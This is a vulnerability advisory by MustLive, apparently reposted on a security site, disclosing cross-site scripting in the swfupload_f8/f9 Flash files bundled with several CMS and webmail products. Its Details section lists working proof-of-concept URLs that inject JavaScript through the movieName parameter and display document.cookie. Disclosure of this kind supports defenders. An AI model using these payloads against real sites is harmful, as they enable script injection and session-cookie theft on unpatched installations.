swfupload_f8.swf Cross Site Scripting

2012-11-22 / 2013-07-20
Credit: MustLive
Risk: Low
Local: No
Remote: Yes


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Hello list! I will draw your attention to XSS vulnerability in other web applications with swfupload. Earlier I've wrote about swfupload in AionWeb, Magento, Liferay Portal, SurgeMail, symfony and that this hole is available in many other web applications. In previous letters I've wrote concerning web applications with swfupload.swf and swfupload_f9.swf (which are for Flash Player 10 and Flash Player 9). And now I'll write about web applications with swfupload_f8.swf (which is for Flash Player 8). Here is information about Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal (Community Edition, which earlier called Standard Edition, and Enterprise Edition), SurgeMail, symfony - among multiple web applications which are bundled with swfupload_f8.swf. ------------------------- Affected products: ------------------------- Vulnerable are potentially all versions of Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal (Community Edition, which earlier called Standard Edition, and Enterprise Edition), SurgeMail, symfony. There is no information that they have fixed this vulnerability in their software (at that this vulnerability was fixed in WordPress 3.3.2 at 20.04.2012). The developers of WordPress released new version of flash file (the same did the developers of XenForo), which could be used by all web developers, which were using swfupload. But in WordPress and XenForo the swfupload.swf was fixed, not swfupload_f8.swf and these are different versions of the same flash application (designed for different versions of Flash Player). Taking into account current wide spreading of Flash Player 10.x and 11.x, then developers of these web applications could replace swfupload_f8.swf with new fixed version of Swfupload. ---------- Details: ---------- XSS (WASC-08): Archiv plugin for TinyMCE: http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Squeeze Documents for SPIP: http://site/plugins_spip/squeeze_documents/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/plugins_spip/squeeze_documents/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Upload Manager for Radiant CMS: http://site/public/swfupload/Flash8/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/public/swfupload/Flash9/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// AionWeb: http://site/engine/classes/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// AionWeb also contains swfupload_f8.swf, besides described earlier swfupload.swf and swfupload_f9.swf. Liferay Portal: http://site/html/js/misc/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Liferay Portal also contains swfupload_f8.swf, besides described earlier swfupload_f9.swf. SurgeMail: http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// SurgeMail also contains swfupload_f8.swf, besides described earlier swfupload.swf and swfupload_f9.swf. symfony: http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// symfony also contains swfupload_f8.swf, besides described earlier swfupload_f9.swf. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

References:

http://websecurity.com.ua


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top